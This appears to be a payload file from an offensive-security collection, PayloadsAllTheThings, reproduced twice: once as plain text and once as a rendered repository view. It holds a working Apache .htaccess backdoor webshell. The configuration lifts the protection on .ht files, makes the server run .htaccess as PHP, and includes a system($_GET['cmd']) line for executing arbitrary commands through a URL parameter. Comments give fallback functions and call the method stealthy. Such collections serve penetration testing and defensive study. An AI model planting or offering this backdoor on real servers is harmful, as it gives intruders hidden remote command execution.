killchain-compendium/misc/PayloadsAllTheThings/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell

# htaccess backdoor shell
# this is relatively stealthy compared to a typical webshell

# overriding deny rule
# making htaccess accessible from the internet
# without this you'll get a HTTP 403
<Files ~ "^\.ht">
Require all granted
Order allow,deny
Allow from all
</Files>

# Make the server treat .htaccess file as .php file
AddType application/x-httpd-php .htaccess

# <?php system($_GET['cmd']); ?>

# To execute commands you would navigate to:
# http://vulnerable.com/.htaccess?cmd=YourCommand

# If system(); isnt working then try other syscalls
# e.g. passthru(); shell_exec(); etc
# If you still cant execute syscalls, try bypassing php.ini via htaccess
bump 2022-05-31 21:08:28 +02:00			`# htaccess backdoor shell`
			`# this is relatively stealthy compared to a typical webshell`

			`# overriding deny rule`
			`# making htaccess accessible from the internet`
			`# without this you'll get a HTTP 403`
			`<Files ~ "^\.ht">`
			`Require all granted`
			`Order allow,deny`
			`Allow from all`
			`</Files>`

			`# Make the server treat .htaccess file as .php file`
			`AddType application/x-httpd-php .htaccess`

			`# <?php system($_GET['cmd']); ?>`

			`# To execute commands you would navigate to:`
			`# http://vulnerable.com/.htaccess?cmd=YourCommand`

			`# If system(); isnt working then try other syscalls`
			`# e.g. passthru(); shell_exec(); etc`
			`# If you still cant execute syscalls, try bypassing php.ini via htaccess`